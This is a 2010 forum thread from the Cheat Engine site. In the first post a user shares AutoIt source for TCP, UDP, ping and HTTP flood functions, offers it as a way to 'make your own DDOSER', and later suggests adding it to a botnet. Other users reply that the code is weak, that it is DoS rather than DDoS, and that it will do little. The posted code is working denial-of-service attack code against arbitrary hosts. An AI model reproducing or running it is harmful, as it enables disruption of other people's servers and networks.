 |
Cheat Engine The Official Site of Cheat Engine
|
View previous topic :: View next topic |
Author |
Message |
Sothe Cheater
Reputation: -1
Joined: 06 Jun 2010 Posts: 33 Location: Phoenix
|
Posted: Sun Jun 06, 2010 2:49 pm Post subject: [AutoIt] DDoS Functions |
|
|
Make your own DDOSER. Since .au3 can't be posted, the sauce.
Code: | #cs ==
Sothes DDOS funcs, for CEF
#ce ==
Func TCPFlood($sIp, $iPort, $iLength)
Local $sock, $iTimeOut, $sOutBuffer, $iTimerInit
$iTimeOut = $iLength*1000
$sOutBuffer = 'x'
For $i = 1 To 65534
$sOutBuffer &= 'x'
Next
$iTimerInit = TimerInit()
While TimerDiff($iTimerInit) < $iTimeOut
$sock = TCPConnect(TCPNameToIP($sIp),$iPort)
If @error Then Return
TCPSend($sock,$sOutBuffer)
TCPCloseSocket($sock)
WEnd
EndFunc
Func UDPFlood($sIp, $iPort, $iLength)
Local $sock, $iTimeOut, $sOutBuffer, $iTimerInit
$iTimeOut = $iLength*1000
$sOutBuffer = 'x'
For $i = 1 To 65534
$sOutBuffer &= 'x'
Next
$iTimerInit = TimerInit()
While TimerDiff($iTimerInit) < $iTimeOut
$sock = UDPOpen(TCPNameToIP($sIp),$iPort)
If @error Then Return
UDPSend($sock,$sOutBuffer)
UDPCloseSocket($sock)
WEnd
EndFunc
Func PingFlood($sIp, $iLength, $iPingTimeOut = 10)
Local $iTimeOut, $iTimerInit
$iTimeOut = $iLength*1000
$iTimerInit = TimerInit()
While TimerDiff($iTimerInit) < $iTimeOut
Ping($sIp,$iPingTimeOut)
WEnd
EndFunc
Func HTTPFlood($sIp, $iPort, $iLength)
Local $sock, $iTimeOut, $sOutBuffer, $iTimerInit
$iTimeOut = $iLength*1000
$sOutBuffer = "GET"
$iTimerInit = TimerInit()
While TimerDiff($iTimerInit) < $iTimeOut
$sock = TCPConnect(TCPNameToIP($sIp),$iPort)
If @error Then Return
TCPSend($sock,$sOutBuffer)
TCPCloseSocket($sock)
WEnd
EndFunc |
If you like, +rep
_________________
Hello kiddies, this is your captain speaking. |
|
Back to top |
|
 |
Jesper Grandmaster Cheater Supreme
Reputation: 9
Joined: 21 Feb 2007 Posts: 1156
|
Posted: Sun Jun 06, 2010 2:52 pm Post subject: |
|
|
This will have as much impact on you as on the victim.
|
|
Back to top |
|
 |
Sothe Cheater
Reputation: -1
Joined: 06 Jun 2010 Posts: 33 Location: Phoenix
|
Posted: Sun Jun 06, 2010 3:01 pm Post subject: |
|
|
SwallowIt wrote: | This will have as much impact on you as on the victim. |
too bad huh?
_________________
Hello kiddies, this is your captain speaking. |
|
Back to top |
|
 |
Jesper Grandmaster Cheater Supreme
Reputation: 9
Joined: 21 Feb 2007 Posts: 1156
|
Posted: Sun Jun 06, 2010 3:12 pm Post subject: |
|
|
Unless you make a botnet with these it won't be DDoS either, just DoS.
|
|
Back to top |
|
 |
Sothe Cheater
Reputation: -1
Joined: 06 Jun 2010 Posts: 33 Location: Phoenix
|
Posted: Sun Jun 06, 2010 3:20 pm Post subject: |
|
|
Oops, forgot.
Thanks for reminding me.
Add it to your BOTNET
_________________
Hello kiddies, this is your captain speaking. |
|
Back to top |
|
 |
hcavolsdsadgadsg I'm a spammer
Reputation: 26
Joined: 11 Jun 2007 Posts: 5801
|
Posted: Sun Jun 06, 2010 4:22 pm Post subject: |
|
|
this is dumb and will do nothing.
|
|
Back to top |
|
 |
Evil_Intentions Expert Cheater
Reputation: 65
Joined: 07 Jan 2010 Posts: 214
|
Posted: Sun Jun 06, 2010 5:37 pm Post subject: |
|
|
So you're basically pinging someone with a large buffer, a lot of times correct? Which is reminiscent of the old "Ping of Death" that people used to do in command prompt. If the highest the buffer size can be is only 65534, this isn't going to do anything. So on that ground, i agree with slovach.
|
|
Back to top |
|
 |
|
|
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum You cannot attach files in this forum You can download files in this forum
|
|